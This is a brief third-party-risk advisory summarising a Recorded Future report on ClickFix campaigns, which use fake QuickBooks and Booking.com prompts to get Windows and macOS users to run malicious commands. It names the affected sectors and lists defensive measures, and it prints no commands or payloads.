ClickFix Social Engineering Campaigns Target Windows and macOS, Including Booking.com Users
What Happened — Insikt Group identified five distinct ClickFix clusters that use social‑engineering lures (e.g., fake QuickBooks or Booking.com prompts) to trick victims into running malicious commands via the Windows Run dialog or macOS Terminal. The campaigns have been active since at least May 2024 and adapt to the victim’s operating system to deliver in‑memory, living‑off‑the‑land payloads.
Why It Matters for TPRM —
- Initial‑access techniques bypass traditional endpoint signatures, raising risk for any third‑party that provides remote workstations or SaaS tools.
- The reusable “template” can be repurposed by multiple threat actors, expanding the attack surface across supply‑chain partners.
- Persistent, fast‑changing infrastructure makes indicator‑based blocking ineffective, demanding behavioral controls at the vendor level.
Who Is Affected — Travel & hospitality (e.g., Booking.com), accounting software providers, real‑estate firms, legal services, and any organization that allows end‑users to run native OS commands.
Recommended Actions —
- Disable the Windows Run dialog via Group Policy Objects (GPO).
- Enforce PowerShell Constrained Language Mode (CLM) on all Windows endpoints.
- Deploy Digital Risk Prevention tools (e.g., Recorded Future Malicious Websites) to block malicious domains.
- Conduct user‑awareness training focused on “run‑dialog” and “terminal” phishing lures.
Technical Notes — The ClickFix technique leverages OS detection to serve platform‑specific commands, executes obfuscated scripts in memory, and relies on legitimate system utilities (Run dialog, Terminal) to evade AV. No specific CVE is cited; the threat is driven by social engineering rather than a software flaw. Source: https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos